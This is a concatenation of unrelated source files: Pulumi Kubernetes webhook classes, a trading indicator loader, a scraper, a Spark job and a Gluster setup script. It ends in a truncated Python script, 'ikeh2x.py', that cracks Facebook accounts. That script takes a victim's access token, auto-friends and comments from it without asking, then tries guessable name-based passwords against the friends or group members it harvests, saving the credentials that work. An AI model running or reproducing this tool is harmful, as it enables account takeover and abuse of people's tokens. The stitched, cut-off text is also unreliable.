Attempting to use a user or basic auth e.g. "user:password@" is not allowed. Fragments ("#...") and query parameters ("?...") are not allowed, either.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class WebhookClientConfigArgs:
def __init__(__self__, *,
ca_bundle: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input['ServiceReferenceArgs']] = None,
url: Optional[pulumi.Input[str]] = None):
"""
WebhookClientConfig contains the information to make a TLS connection with the webhook.
:param pulumi.Input[str] ca_bundle: caBundle is a PEM encoded CA bundle which will be used to validate the webhook's server certificate. If unspecified, system trust roots on the apiserver are used.
:param pulumi.Input['ServiceReferenceArgs'] service: service is a reference to the service for this webhook. Either service or url must be specified.
If the webhook is running within the cluster, then you should use `service`.
:param pulumi.Input[str] url: url gives the location of the webhook, in standard URL form (`scheme://host:port/path`). Exactly one of `url` or `service` must be specified.
The `host` should not refer to a service running in the cluster; use the `service` field instead. The host might be resolved via external DNS in some apiservers (e.g., `kube-apiserver` cannot resolve in-cluster DNS as that would be a layering violation). `host` may also be an IP address.
Please note that using `localhost` or `127.0.0.1` as a `host` is risky unless you take great care to run this webhook on all hosts which run an apiserver which might need to make calls to this webhook. Such installs are likely to be non-portable, i.e., not easy to turn up in a new cluster.
The scheme must be "https"; the URL must begin with "https://".
A path is optional, and if present may be any string permissible in a URL. You may use the path to pass an arbitrary string to the webhook, for example, a cluster identifier.
Attempting to use a user or basic auth e.g. "user:password@" is not allowed. Fragments ("#...") and query parameters ("?...") are not allowed, either.
"""
if ca_bundle is not None:
pulumi.set(__self__, "ca_bundle", ca_bundle)
if service is not None:
pulumi.set(__self__, "service", service)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="caBundle")
def ca_bundle(self) -> Optional[pulumi.Input[str]]:
"""
caBundle is a PEM encoded CA bundle which will be used to validate the webhook's server certificate. If unspecified, system trust roots on the apiserver are used.
"""
return pulumi.get(self, "ca_bundle")
@ca_bundle.setter
def ca_bundle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_bundle", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input['ServiceReferenceArgs']]:
"""
service is a reference to the service for this webhook. Either service or url must be specified.
If the webhook is running within the cluster, then you should use `service`.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input['ServiceReferenceArgs']]):
pulumi.set(self, "service", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
url gives the location of the webhook, in standard URL form (`scheme://host:port/path`). Exactly one of `url` or `service` must be specified.
The `host` should not refer to a service running in the cluster; use the `service` field instead. The host might be resolved via external DNS in some apiservers (e.g., `kube-apiserver` cannot resolve in-cluster DNS as that would be a layering violation). `host` may also be an IP address.
Please note that using `localhost` or `127.0.0.1` as a `host` is risky unless you take great care to run this webhook on all hosts which run an apiserver which might need to make calls to this webhook. Such installs are likely to be non-portable, i.e., not easy to turn up in a new cluster.
The scheme must be "https"; the URL must begin with "https://".
A path is optional, and if present may be any string permissible in a URL. You may use the path to pass an arbitrary string to the webhook, for example, a cluster identifier.
Attempting to use a user or basic auth e.g. "user:password@" is not allowed. Fragments ("#...") and query parameters ("?...") are not allowed, either.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class WebhookConversionPatchArgs:
def __init__(__self__, *,
client_config: Optional[pulumi.Input['WebhookClientConfigPatchArgs']] = None,
conversion_review_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
WebhookConversion describes how to call a conversion webhook
:param pulumi.Input['WebhookClientConfigPatchArgs'] client_config: clientConfig is the instructions for how to call the webhook if strategy is `Webhook`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] conversion_review_versions: conversionReviewVersions is an ordered list of preferred `ConversionReview` versions the Webhook expects. The API server will use the first version in the list which it supports. If none of the versions specified in this list are supported by API server, conversion will fail for the custom resource. If a persisted Webhook configuration specifies allowed versions and does not include any versions known to the API Server, calls to the webhook will fail.
"""
if client_config is not None:
pulumi.set(__self__, "client_config", client_config)
if conversion_review_versions is not None:
pulumi.set(__self__, "conversion_review_versions", conversion_review_versions)
@property
@pulumi.getter(name="clientConfig")
def client_config(self) -> Optional[pulumi.Input['WebhookClientConfigPatchArgs']]:
"""
clientConfig is the instructions for how to call the webhook if strategy is `Webhook`.
"""
return pulumi.get(self, "client_config")
@client_config.setter
def client_config(self, value: Optional[pulumi.Input['WebhookClientConfigPatchArgs']]):
pulumi.set(self, "client_config", value)
@property
@pulumi.getter(name="conversionReviewVersions")
def conversion_review_versions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
conversionReviewVersions is an ordered list of preferred `ConversionReview` versions the Webhook expects. The API server will use the first version in the list which it supports. If none of the versions specified in this list are supported by API server, conversion will fail for the custom resource. If a persisted Webhook configuration specifies allowed versions and does not include any versions known to the API Server, calls to the webhook will fail.
"""
return pulumi.get(self, "conversion_review_versions")
@conversion_review_versions.setter
def conversion_review_versions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "conversion_review_versions", value)
@pulumi.input_type
class WebhookConversionArgs:
def __init__(__self__, *,
conversion_review_versions: pulumi.Input[Sequence[pulumi.Input[str]]],
client_config: Optional[pulumi.Input['WebhookClientConfigArgs']] = None):
"""
WebhookConversion describes how to call a conversion webhook
:param pulumi.Input[Sequence[pulumi.Input[str]]] conversion_review_versions: conversionReviewVersions is an ordered list of preferred `ConversionReview` versions the Webhook expects. The API server will use the first version in the list which it supports. If none of the versions specified in this list are supported by API server, conversion will fail for the custom resource. If a persisted Webhook configuration specifies allowed versions and does not include any versions known to the API Server, calls to the webhook will fail.
:param pulumi.Input['WebhookClientConfigArgs'] client_config: clientConfig is the instructions for how to call the webhook if strategy is `Webhook`.
"""
pulumi.set(__self__, "conversion_review_versions", conversion_review_versions)
if client_config is not None:
pulumi.set(__self__, "client_config", client_config)
@property
@pulumi.getter(name="conversionReviewVersions")
def conversion_review_versions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
conversionReviewVersions is an ordered list of preferred `ConversionReview` versions the Webhook expects. The API server will use the first version in the list which it supports. If none of the versions specified in this list are supported by API server, conversion will fail for the custom resource. If a persisted Webhook configuration specifies allowed versions and does not include any versions known to the API Server, calls to the webhook will fail.
"""
return pulumi.get(self, "conversion_review_versions")
@conversion_review_versions.setter
def conversion_review_versions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "conversion_review_versions", value)
@property
@pulumi.getter(name="clientConfig")
def client_config(self) -> Optional[pulumi.Input['WebhookClientConfigArgs']]:
"""
clientConfig is the instructions for how to call the webhook if strategy is `Webhook`.
"""
return pulumi.get(self, "client_config")
@client_config.setter
def client_config(self, value: Optional[pulumi.Input['WebhookClientConfigArgs']]):
pulumi.set(self, "client_config", value)
| [
"noreply@github.com"
] | pulumi.noreply@github.com |
bd7e3b4fa866d69b1e9ca2c7cf23196b84b9bccc | 6d90aa11885178e064b88363c5b6a988c50fa4ad | /aquitania/indicator/management/indicator_loader.py | c26e86546d6551e1eba5f8064c824f52856d5881 | [
"MIT"
] | permissive | retorno/aquitania | 2532c2591edae4ccf2286c771fcff011b5c5eef2 | cd64cf00827b692621893c0e00c508cd5e7ef55b | refs/heads/master | 2020-03-17T08:19:27.734553 | 2018-05-11T00:25:05 | 2018-05-11T00:25:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,844 | py | ########################################################################################################################
# |||||||||||||||||||||||||||||||||||||||||||||||||| AQUITANIA ||||||||||||||||||||||||||||||||||||||||||||||||||||||| #
# |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| #
# |||| To be a thinker means to go by the factual evidence of a case, not by the judgment of others |||||||||||||||||| #
# |||| As there is no group stomach to digest collectively, there is no group mind to think collectively. |||||||||||| #
# |||| Each man must accept responsibility for his own life, each must be sovereign by his own judgment. ||||||||||||| #
# |||| If a man believes a claim to be true, then he must hold to this belief even though society opposes him. ||||||| #
# |||| Not only know what you want, but be willing to break all established conventions to accomplish it. |||||||||||| #
# |||| The merit of a design is the only credential that you require. |||||||||||||||||||||||||||||||||||||||||||||||| #
# |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| #
########################################################################################################################
"""
.. moduleauthor:: H Roark
"""
import numpy as np
import pandas as pd
from aquitania.indicator.management.indicator_data import *
import copy
class IndicatorLoader:
"""
An IndicatorLoader object holds all indicators for a specific Financial Security
"""
def __init__(self, indicator_list, finsec, timestamp, broker_instance):
"""
Initializes IndicatorLoader for specific currency and timestamp.
:param indicator_list: Indicators to be evaluated
:param finsec: Financial Security that will be evaluated
:param timestamp: Timestamp of the IndicatorLoader
"""
# Initialize variables
self._indicator_list = indicator_list
self._currency = finsec
self._timestamp = timestamp
self._broker_instance = broker_instance
self._datetimes = []
self._last_candle_dt = None
self._candle_complete = []
def feed(self, candle):
"""
Feeds open candle into open indicators and fillna() to closed indicators.
:param candle: Input Candle
"""
# Store Routine
self.store_candle(candle)
# Feeds Candle to all indicators
for indicator in self._indicator_list:
# Routine for open indicator and closed indicators when candle is complete
if indicator.is_open or candle.complete:
indicator.feed(candle)
else:
# Fillna closed indicators
indicator.fillna()
def fillna(self, candle):
"""
Saves indicators in case it is a not relevant candle.
:param candle: Last Candle evaluated
"""
# Store Candle Routine
self.store_candle(candle)
# FillNA method
for indicator in self._indicator_list:
indicator.fillna()
def store_candle(self, candle):
"""
Store Candle routine
:param candle: Candle to be stored
"""
self._datetimes.append(candle.datetime)
self._candle_complete.append(candle.complete)
self._last_candle_dt = copy.copy(candle.datetime)
def save_output(self):
"""
Combines the output of all the indicators in a single pandas DataFrame.
"""
# Initializes IndicatorDataManager
odm = IndicatorDataManager(self._currency, self._broker_instance)
df = self.generate_df()
odm.save_output(df, self._timestamp)
def generate_df(self):
# Initialize Variables
df = None
# Get candles index
index = self._datetimes
# Gets output from indicators
for indicator in self._indicator_list:
# Go to next element if columns are empty
if not indicator.columns:
indicator.output_list = []
continue
temp_df = pd.DataFrame(indicator.output_list, columns=indicator.columns)
if df is None:
df = temp_df
else:
df = pd.concat([df, temp_df], axis=1)
# Clears list from memory
indicator.output_list = []
if df is None:
self._datetimes = []
self._candle_complete = []
return df
df['complete_{}'.format(ref.ts_to_letter[self._timestamp])] = np.array([self._candle_complete]).T
df.index = index
self._datetimes = []
self._candle_complete = []
# Returns values
return df
| [
"hroark.aquitania@gmail.com"
] | hroark.aquitania@gmail.com |
8a5cbbbeac6f891fa3dd895c6197b30790a72054 | d7d26c42cd541417edcd7b1992027286ecef7f04 | /lib/base/webscraper/class_htmlparser.py | 72a005b1e355998005611f8d790a5ebcc019c4c5 | [] | no_license | plutoese/pluto_archive | bfba8df48ee5639a2666b33432004519b93ecbf7 | e6ea64aaf867fd0433714293eb65a18a28d3136d | refs/heads/master | 2021-10-22T14:46:20.540770 | 2019-03-11T12:31:08 | 2019-03-11T12:31:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,188 | py | # coding=UTF-8
# --------------------------------------------------------------
# class_htmlparser文件
# @class: HtmlParser类
# @introduction: HtmlParser类用来解析html对象
# @dependency: bs4及re包
# @author: plutoese
# @date: 2016.06.24
# --------------------------------------------------------------
from bs4 import BeautifulSoup
import re
class HtmlParser:
"""HtmlParser类用来解析html对象
:param str htmlcontent: html的字符串
:return: 无返回值
"""
def __init__(self,html_content=None):
if isinstance(html_content,BeautifulSoup):
self.bs_obj = html_content
else:
self.html_content = html_content
self.bs_obj = BeautifulSoup(self.html_content, "lxml")
def table(self,css=None):
""" 返回表格的数据
:param css: table的css选择器
:return: 表格的列表
"""
table = []
if css is not None:
tds = self.bs_obj.select(''.join([css,' > tr']))
for item in tds:
table.append([re.sub('\s+','',unit.text) for unit in item.select('td')])
return table
if __name__ == '__main__':
pass
| [
"glen.zhang7@gmail.com"
] | glen.zhang7@gmail.com |
41208d7b3f5a3dceb3e7edf90ba118ac4beffc7a | 45a08d6dd0e7ef32aaebc52740c9ecdec3755e19 | /lab1/A0186040M/lettercount.py | 7ab959220829c28c0ed5615a3d2c9ca8d0d47262 | [] | no_license | liping97412/CS5344 | c81c5f758efa4bb55a39bcb2cbfe954d2d3e8a7d | cfe1c620d97f6e8988944c7eaca9063cef3f5bb2 | refs/heads/master | 2020-09-11T11:25:57.183537 | 2019-11-16T04:48:26 | 2019-11-16T04:48:26 | 222,048,520 | 0 | 0 | null | 2019-11-16T04:49:04 | 2019-11-16T04:46:49 | Python | UTF-8 | Python | false | false | 518 | py | import re
import sys
from pyspark import SparkConf, SparkContext
conf = SparkConf()
sc = SparkContext(conf=conf)
lines = sc.textFile(sys.argv[1])
#split the input file to words with space
words1 = lines.flatMap(lambda l: re.split(" ",l))
#filter the words that have length
words = words1.filter(lambda w: len(w)>0)
#map to the first letter
pairs = words.map(lambda w : (w[0], 1))
#reduce - add up together
result = pairs.reduceByKey(lambda x, y : x + y)
#save the result
result.saveAsTextFile(sys.argv[2])
sc.stop()
| [
"liping.li@u.nus.edu"
] | liping.li@u.nus.edu |
dd7f17b4d5045f1b3430ce33e7bd8589e7e8e82a | 9a846850c38338c3d8200131e734d158acb3bdc8 | /weixin/urls.py | c83c951bb5f1e4d14222955585b351931b0a9812 | [] | no_license | smartpigling/wxsite | 8849ea61ffc40cc1ae64b81abd9098102f516588 | 443b99b6945df8d37fa991e3eb67c9e0710062b6 | refs/heads/master | 2021-07-10T10:16:07.717158 | 2016-10-08T10:45:04 | 2016-10-08T10:45:04 | 42,555,152 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | # -*-coding:utf-8 -*-
"""
Created on 2015-09-10
@author: 汤晓川
"""
from django.conf.urls import patterns,url
from .views import Weixin, UserLocationFetching
urlpatterns = patterns('',
url(r'^location/fetch/$', UserLocationFetching.as_view(), name='weixin_fetch_user_location'),
url(r'^(\w+)/$', Weixin.as_view(), name='weixin_entry'),
)
| [
"173387911@qq.com"
] | 173387911@qq.com |
26270c4f53318a3a0e7c8c6c693c57e11c804cc0 | fc8f9724643ab70f96debd4bf5438ea0489d3015 | /playbooks/pvsetup.py | 1618e0d64285601dd61b7bedbfb1785ceb9a8b17 | [] | no_license | ashmitha7/Gluster-Volumes-Ansible | 8f1284fa964d39517709c731059e9957cf56524b | 058a04813a06e0cd911d474daf8fd1452ba5edc9 | refs/heads/master | 2020-12-07T15:35:49.696340 | 2017-08-30T06:15:12 | 2017-08-30T06:15:12 | 95,549,091 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,666 | py | import os
import json
from ast import literal_eval
from tempfile import NamedTemporaryFile
import argparse
from ansible.playbook import Playbook
from ansible.module_utils.basic import *
import jinja2
import yaml
parser = argparse.ArgumentParser()
parser.add_argument("--type", '-t',
required=True,
help="disk type is required",
choices=["JBOD", "RAID6", "RAID10"])
parser.add_argument("--pvlocation", '-p')
parser.add_argument("--size", '-s')
parser.add_argument("--number_of_disks", '-n')
class PhysicalVolCreate(object):
def __init__(self):
pass
def data_align(self, type, number_of_disks=None, size=None):
if type == 'JBOD':
dalign= 256
return dalign
elif type == 'RAID6':
dalign= (number_of_disks-2)*size
return dalign
elif type=='RAID10':
dalign= (number_of_disks/2)*size
return dalign
return ("Not valid")
def main():
args = parser.parse_args()
type = args.type
if type == 'JBOD':
data_align = PhysicalVolCreate().data_align(type)
else:
number_of_disks = args.number_of_disks
size = args.size
data_align = PhysicalVolCreate().data_align(type, number_of_disks, size)
pvlocation = args.pvlocation
vars = {
"pvlocation": args.pvlocation,
"dalign": data_align
}
with open('./roles/pv/vars/main.yml', 'w+') as varfile:
yaml.dump(vars, varfile, default_flow_style=False)
os.system("ansible-playbook -i host.ini " + ' playbooks/play.yml')
if __name__ == '__main__':
main()
| [
"asambast@dhcp35-211.lab.eng.blr.redhat.com"
] | asambast@dhcp35-211.lab.eng.blr.redhat.com |
73d5020359e306ad4a4a7832385941b010cfc7fb | cc959c8ba773c5a47c039f761ce77319df41ced3 | /ikeh2x.py | a91f8e268e230b4ace6a47faa4d6078bc5c5b8fc | [] | no_license | dikaxyz/yametekudasai | 517801c3d7ebae8dc69dfff87d0e2df29ac319f7 | c7e0907d1456a7ab932f58ef6520793ce4bec317 | refs/heads/main | 2023-01-23T21:21:48.833190 | 2020-12-04T12:49:41 | 2020-12-04T12:49:41 | 318,515,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,377 | py | #!/usr/bin/python2
# coding=utf-8
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
from datetime import datetime
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
try:
import requests
except ImportError:
os.system("pip2 install requests")
os.system("python2 DILZ-R.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "[!] Exit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'%s;'%str(31+j))
x += ''
x = x.replace('!0','')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
#########LOGO#########
logo = """
\33[31;1m██╗██╗░░██╗███████╗██╗░░██╗██████╗░██╗░░██╗
\33[31;1m██║██║░██╔╝██╔════╝██║░░██║╚════██╗╚██╗██╔╝
\33[31;1m██║█████═╝░█████╗░░███████║░░███╔═╝░╚███╔╝░
\33[31;1m██║██╔═██╗░██╔══╝░░██╔══██║██╔══╝░░░██╔██╗░
\33[31;1m██║██║░╚██╗███████╗██║░░██║███████╗██╔╝╚██╗
\33[31;1m╚═╝╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
\033[1;41;97m Dika Andrian sr. \033[0m
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m●\033[1;97m]\033[1;93m Sedang Masuk\033[1;97m "+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
######MASUK######
def masuk():
os.system('clear')
print logo
print "\033[1;97m ╔ ╗"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;96m\033[1;97m Login Menggunakan Token Facebook"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;96m\033[1;97m Keluar"
print "\033[1;97m ╚ ╝"
pilih_masuk()
def pilih_masuk():
msuk = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if msuk =="":
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar kontol !"
pilih_masuk()
elif msuk =="1" or msuk =="01":
tokenz()
elif msuk =="0" or msuk =="00":
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar kontol !"
pilih_masuk()
#####LOGIN_TOKENZ#####
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;97m[\033[1;39m?\033[1;97m] \33[31;1mToken : \33[31;1m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
jalan ('\033[1;97m JANGAN LUPA ADD AKUN WATASHI MINAAA1!1!1')
print '\033[1;97m[\033[1;39m✓\033[1;97m]\033[1;39m Alhamdulillah'
os.system('xdg-open https://www.facebook.com/james.rodricks.3958')
bot_komen()
except KeyError:
print "\033[1;97m[\033[1;39m!\033[1;97m] \033[1;39mToken Salah !"
time.sleep(1)
masuk()
######BOT KOMEN#######
def bot_komen():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;39m[!] Token invalid"
os.system('rm -rf login.txt')
una = ('100011037908446')
kom = ('Assalamualaikum💅💅')
reac = ('ANGRY')
post = ('1229536774090908')
post2 = ('1229536774090908')
kom2 = ('Izin Pakai sc lu bang💅💅')
reac2 = ('LOVE')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +una+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
menu()
######MENU#######
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' +toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;93m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;93m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;93m3.\x1b[1;93m Informasi akun "
print "\x1b[1;93m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar kontol"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar kontol"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar kontol"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
